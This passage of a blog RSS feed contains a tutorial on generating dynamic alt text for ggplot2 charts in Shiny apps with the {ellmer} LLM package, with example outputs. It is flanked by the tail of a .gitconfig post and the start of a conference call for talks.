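To confirm which identity is active, run &lt;code&gt;git config user.email&lt;/code&gt; from inside a repository.&lt;/p&gt;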
&lt;h2 id="putting-it-all-together"&gt;Putting It All Together&lt;/h2&gt;
&lt;p&gt;A well-configured &lt;code&gt;.gitconfig&lt;/code&gt; file transforms Git from a tool you fight with into one that works seamlessly with your workflow.
Avoid copying and pasting configuration options you don&amp;rsquo;t understand.
Instead, consider each change in turn, and add it to your &lt;code&gt;.gitconfig&lt;/code&gt; file.
Remember, you can view your current configuration at any time with &lt;code&gt;git config --list&lt;/code&gt; and edit it with &lt;code&gt;git config --global --edit&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/recommended-gitconfig/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Using {ellmer} for Dynamic Alt Text Generation in {shiny} Apps</title><link>https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/</link><pubDate>Thu, 22 Jan 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="alt-text"&gt;Alt Text&lt;/h2&gt;
&lt;p&gt;First things first, if you haven’t heard of or used alt text before, it
is a brief written description of an image that explains context and
purpose. It is used to improve accessibility by allowing screen readers
to describe images, or provide context if an image fails to load. For
writing good alt text see this article by
&lt;a href="https://accessibility.huit.harvard.edu/describe-content-images" rel="external"&gt;Harvard&lt;/a&gt;,
but some good rules of thumb are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Keep it concise and relevant to the context of why the image is being
used.&lt;/li&gt;
&lt;li&gt;Screen readers will already say “Image of …”, so we don’t need to
include this unless the style is important (drawing, cartoon etc).&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="alt-text-within-apps-and-dashboards"&gt;Alt Text within Apps and Dashboards&lt;/h2&gt;
&lt;p&gt;I don’t need to list the positives of interactive apps and dashboards,
but one of the main ones is that users can explore data in their own
way. This is a great thing most of the time, but one pitfall that is
often overlooked is that interactivity can overshadow accessibility,
whether it’s a fancy widget that’s hard (or impossible) to use via
keyboard or an interactive visualisation without meaningful
alternative text.&lt;/p&gt;
&lt;p&gt;In this post, we’ll look at a new approach to generating dynamic alt
text for ggplot2 charts using &lt;a href="https://ellmer.tidyverse.org/" rel="external"&gt;{ellmer}&lt;/a&gt;,
Posit’s new R package for querying large language models (LLMs) from R.
If you are using Shiny for Python then
&lt;a href="https://github.com/posit-dev/chatlas" rel="external"&gt;chatlas&lt;/a&gt; will be of interest to
you.&lt;/p&gt;
&lt;h2 id="why-dynamic-alt-text-needs-care"&gt;Why Dynamic Alt Text Needs Care&lt;/h2&gt;
&lt;p&gt;Automatically generating alt text is appealing, but production Shiny
apps have constraints:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Plots may re-render frequently&lt;/li&gt;
&lt;li&gt;API calls can fail or be rate-limited&lt;/li&gt;
&lt;li&gt;Accessibility should degrade gracefully, not break the app&lt;/li&gt;
&lt;li&gt;A good implementation should be consistent, fault-tolerant, and cheap
to run.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="using-ellmer-in-a-shiny-app"&gt;Using {ellmer} in a Shiny App&lt;/h2&gt;
&lt;p&gt;The first step is setting up a connection to your chosen LLM. I am using
Google Gemini 2.5 Flash as there is a generous free tier, but other models
and providers are available. In a Shiny app, this can be done outside the
reactive context:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ellmer)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gemini &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat_google_gemini&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Using model = &amp;quot;gemini-2.5-flash&amp;quot;.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note: You should have a Google Gemini key saved in your .Renviron file as
&lt;code&gt;GEMINI_API_KEY&lt;/code&gt;; this way the {ellmer} function will be able to find
it. More information on generating a Gemini API key can be found in the
&lt;a href="https://ai.google.dev/gemini-api/docs/api-key" rel="external"&gt;Gemini docs&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Then we have the function for generating the alt text:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;generate_alt_text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(ggplot_obj, model) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; temp &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;on.exit&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlink&lt;/span&gt;(temp))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggsave&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; temp,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot_obj,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dpi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;150&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tryCatch&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Generate concise alt text for this plot image.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Describe the chart type, variables shown,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;key patterns or trends, and value ranges where visible.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;content_image_file&lt;/span&gt;(temp)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; error &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(e) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Data visualisation showing trends and comparisons.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The function has a few features that will keep the output more reliable:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Consistent image size and resolution - helps model reliability when
reading axes and labels.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Explicit cleanup of temporary files - we don’t need to save the images
once text is generated.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Error handling - if the model call fails, the app still returns usable
alt text. We kept our fallback text simple for demonstration purposes,
but you can attempt to add more detail.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;External model initialisation - only created once and passed in,
rather than re-created on every reactive update.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;p&gt;In this section we will create a few example plots and then see what the
LLM generates.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;simple_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(Sepal.Width, Sepal.Length) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;simple_plot
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="simple_plot.png" alt="Scatter plot of the Iris data." width="672" /&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;simple_plot_alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_alt_text&lt;/span&gt;(simple_plot, gemini)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alt text generated by AI: &amp;#34;&lt;/span&gt;, simple_plot_alt)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alt text generated by AI:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Scatter plot showing Sepal.Length on the y-axis (ranging from
approximately 4.5 to 8.0) versus Sepal.Width on the x-axis (ranging
from approximately 2.0 to 4.5). The data points appear to form two
distinct clusters: one with Sepal.Width between 2.0 and 3.0 and
Sepal.Length between 5.0 and 8.0, and another with Sepal.Width between
3.0 and 4.5 and Sepal.Length between 4.5 and 6.5.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(Sepal.Width, Sepal.Length, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="coloured_plot.png" alt="Scatter plot of the Iris data coloured by species." width="672" /&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_alt_text&lt;/span&gt;(plot, gemini)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alt text generated by AI: &amp;#34;&lt;/span&gt;, plot_alt)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alt text generated by AI:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Scatter plot showing Sepal.Length on the y-axis (range 4.5-8.0) versus
Sepal.Width on the x-axis (range 2.0-4.5), with points colored by
Species. Red points, labeled &amp;ldquo;setosa&amp;rdquo;, form a distinct cluster with
higher Sepal.Width (3.0-4.5) and lower Sepal.Length (4.5-5.8). Blue
points, &amp;ldquo;virginica&amp;rdquo;, tend to have higher Sepal.Length (5.5-8.0) and
moderate Sepal.Width (2.5-3.8). Green points, &amp;ldquo;versicolor&amp;rdquo;, are in
between, with moderate Sepal.Length (5.0-7.0) and Sepal.Width
(2.0-3.5), overlapping with virginica.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;complicated_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(Sepal.Width, Sepal.Length, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_smooth&lt;/span&gt;(method &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lm&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;complicated_plot
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="complicated_plot.png" alt="Scatter plot of the Iris data coloured by species with an overlaid line of best fit for each species." width="672" /&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;complicated_plot_alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_alt_text&lt;/span&gt;(complicated_plot, gemini)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alt text generated by AI: &amp;#34;&lt;/span&gt;, complicated_plot_alt)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alt text generated by AI:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Scatter plot showing Sepal.Length on the y-axis (range 4.0-8.0) versus
Sepal.Width on the x-axis (range 2.0-4.5). Points and linear
regression lines are colored by Iris species. Red points, “setosa”,
cluster with lower Sepal.Length (4.0-5.8) and higher Sepal.Width
(2.8-4.4). Green points, “versicolor”, and blue points, “virginica”,
largely overlap, showing higher Sepal.Length (5.0-8.0) and moderate
Sepal.Width (2.0-3.8), with “virginica” generally having the longest
sepals. All three species exhibit a positive linear correlation,
indicated by their respective regression lines and shaded confidence
intervals, where increasing sepal width corresponds to increasing
sepal length.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;As we can see, alt text generated by an LLM can be detailed and
informative. Another option I want to point out is including a summary
of the data behind the plot, so that screen reader users can still gain
insight from it.&lt;/p&gt;
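&lt;p&gt;As a rough sketch of what such a summary could look like for the plots above, the snippet below computes the mean sepal width and length for each species using base R. The object name &lt;code&gt;iris_summary&lt;/code&gt; is made up for illustration, and the choice of the mean is an assumption; a range or median may suit your data better.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Mean sepal width and length for each species (one row per species)
iris_summary = aggregate(
  cbind(Sepal.Width, Sepal.Length) ~ Species,
  data = iris,
  FUN = mean
)
iris_summary
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A small table like this can be shown next to the plot, where a screen reader can read it out row by row.&lt;/p&gt;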
&lt;h2 id="using-dynamic-alt-text-in-shiny"&gt;Using Dynamic Alt Text in Shiny&lt;/h2&gt;
&lt;p&gt;Once generated, the alt text can be supplied directly to the UI:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Via the &lt;code&gt;alt&lt;/code&gt; argument of &lt;code&gt;renderPlot()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Or injected into custom HTML for more complex layouts&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Because the text is generated from the rendered plot, it stays in sync
with user inputs and filters.&lt;/p&gt;
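&lt;p&gt;As a minimal sketch of the first option, the app below passes a reactive expression to the &lt;code&gt;alt&lt;/code&gt; argument of &lt;code&gt;renderPlot()&lt;/code&gt;. It assumes that &lt;code&gt;generate_alt_text()&lt;/code&gt; and the &lt;code&gt;gemini&lt;/code&gt; chat object from earlier in this post are already defined. The &lt;code&gt;species&lt;/code&gt; input and &lt;code&gt;scatter&lt;/code&gt; output IDs are made up for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;shiny&amp;#34;)
library(&amp;#34;ggplot2&amp;#34;)

ui = fluidPage(
  selectInput(&amp;#34;species&amp;#34;, &amp;#34;Species&amp;#34;, choices = levels(iris$Species)),
  plotOutput(&amp;#34;scatter&amp;#34;)
)

server = function(input, output, session) {
  # Rebuild the plot whenever the selected species changes
  filtered_plot = reactive({
    ggplot(subset(iris, Species == input$species)) +
      aes(Sepal.Width, Sepal.Length) +
      geom_point()
  })

  # alt accepts a reactive, so the text is regenerated alongside the plot
  output$scatter = renderPlot(
    filtered_plot(),
    alt = reactive(generate_alt_text(filtered_plot(), gemini))
  )
}

shinyApp(ui, server)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Keeping the plot in its own reactive means the same object feeds both the rendered image and the alt text request.&lt;/p&gt;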
&lt;h2 id="other-considerations"&gt;Other Considerations&lt;/h2&gt;
&lt;p&gt;Some apps are more complicated or have a large number of users.
These types of apps need a bit more consideration before adding
features like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Caching alt text for unchanged plots to reduce API usage&lt;/li&gt;
&lt;li&gt;Prompt augmentation with known variable names or units&lt;/li&gt;
&lt;li&gt;Manual overrides for critical visuals&lt;/li&gt;
&lt;/ul&gt;
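&lt;p&gt;To illustrate the caching idea, here is one possible sketch using a plain R environment as an in-memory cache. The &lt;code&gt;alt_text_cache&lt;/code&gt; and &lt;code&gt;cached_alt_text()&lt;/code&gt; names are hypothetical, and the sketch assumes the &lt;code&gt;generate_alt_text()&lt;/code&gt; function from earlier in this post plus a string key that uniquely identifies the plot (for example, the selected input values pasted together).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical in-memory cache, keyed by the inputs that define the plot
alt_text_cache = new.env()

cached_alt_text = function(key, plot, model) {
  if (!exists(key, envir = alt_text_cache, inherits = FALSE)) {
    # Only call the LLM the first time we see this key
    assign(key, generate_alt_text(plot, model), envir = alt_text_cache)
  }
  get(key, envir = alt_text_cache, inherits = FALSE)
}

# For example, inside a Shiny server function:
# alt = reactive(cached_alt_text(input$species, filtered_plot(), gemini))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A cache like this lives for the lifetime of the R process and is shared by every session that process serves, so it is only appropriate when the same inputs always produce the same plot.&lt;/p&gt;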
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;AI-generated alt text works best as a supporting tool, not a replacement
for accessibility review. I have also found it helpful to let users know
that the alt text is AI generated so they know to take it with a pinch
of salt.&lt;/p&gt;
&lt;p&gt;Dynamic alt text is a small feature with a big impact on inclusion. By
combining Shiny’s reactivity with consistent rendering, error handling,
and modern LLMs, we can make interactive data apps more accessible by
default whilst not increasing developer burden.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why Submit to AI in Production: Speaking as a Tool for Better Work</title><link>https://www.jumpingrivers.com/blog/why-submit-ai-in-production/</link><pubDate>Tue, 20 Jan 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-submit-ai-in-production/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-submit-ai-in-production/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-submit-ai-in-production/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re accepting abstracts for AI in Production until &lt;strong&gt;23rd January&lt;/strong&gt;. The conference takes place on &lt;strong&gt;4th–5th June 2026&lt;/strong&gt; in Newcastle, with talks on Friday 5th across two streams: one focused on engineering and production systems, the other on machine learning and model development.&lt;/p&gt;
&lt;p&gt;We often hear: “My work isn&amp;rsquo;t ready to talk about yet” or “I&amp;rsquo;m not sure anyone would be interested.” We want to address that hesitation directly.&lt;/p&gt;
&lt;p&gt;Speaking at a conference isn&amp;rsquo;t primarily about promoting yourself or your organisation.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s a practical tool that helps you do better work. Preparing and delivering a talk forces useful reflection, invites feedback from people facing similar challenges, and turns knowledge that lives only in your head into something your team can reuse.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re wondering whether your work qualifies: internal systems count, work in progress counts, partial success counts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Submit your abstract by &lt;strong&gt;23rd January&lt;/strong&gt; &lt;a href="https://jumpingrivers.com/ai-production/" rel="external"&gt;on the AI in Production website.&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="preparing-a-talk-clarifies-your-decisions"&gt;Preparing a Talk Clarifies Your Decisions&lt;/h2&gt;
&lt;p&gt;When you sit down to explain a technical choice to an audience, you have to answer questions you might have glossed over at the time: Why did we build it this way? What constraints shaped our approach? What would we do differently now?&lt;/p&gt;
&lt;p&gt;This isn&amp;rsquo;t about justifying your decisions to others. It&amp;rsquo;s about understanding them yourself. The process of turning a production system into a coherent narrative forces you to see patterns you were too close to notice while building it. You identify what worked, what didn&amp;rsquo;t, and why. That clarity is valuable whether or not you ever give the talk.&lt;/p&gt;
&lt;p&gt;Many practitioners find that writing an abstract or outline reveals gaps in their thinking. A deployment strategy that seemed obvious in context becomes harder to explain without it. A monitoring approach that felt pragmatic reveals underlying assumptions. This friction is useful. It means you&amp;rsquo;re learning something about your own work.&lt;/p&gt;
&lt;h2 id="speaking-invites-useful-feedback"&gt;Speaking Invites Useful Feedback&lt;/h2&gt;
&lt;p&gt;The audience at AI in Production will broadly fall across two streams: engineering (building, shipping, maintaining, and scaling systems) and machine learning (model development, evaluation, and applied ML).&lt;/p&gt;
&lt;p&gt;Whether you&amp;rsquo;re working on infrastructure and deployment or on training pipelines and model behaviour, you&amp;rsquo;ll be in a room with people facing similar constraints: limited resources, shifting requirements, imperfect data, and operational pressures.&lt;/p&gt;
&lt;p&gt;When you share what you&amp;rsquo;ve tried, you get feedback from people who understand the context. Someone has solved a similar problem differently. Someone has run into the same failure mode. Someone asks a question that makes you reconsider an assumption.&lt;/p&gt;
&lt;p&gt;This kind of peer feedback is hard to get otherwise. Your team is too close to the work. Online discussions lack context. A conference talk puts your approach in front of people who can offer informed perspectives without having to understand your entire stack or organisational structure first.&lt;/p&gt;
&lt;h2 id="talks-help-share-responsibility-and-knowledge"&gt;Talks Help Share Responsibility and Knowledge&lt;/h2&gt;
&lt;p&gt;In many teams, knowledge about production systems sits with one or two people. They know why certain decisions were made, where the edge cases are, and how to interpret the monitoring dashboards. That concentration of knowledge creates risk.&lt;/p&gt;
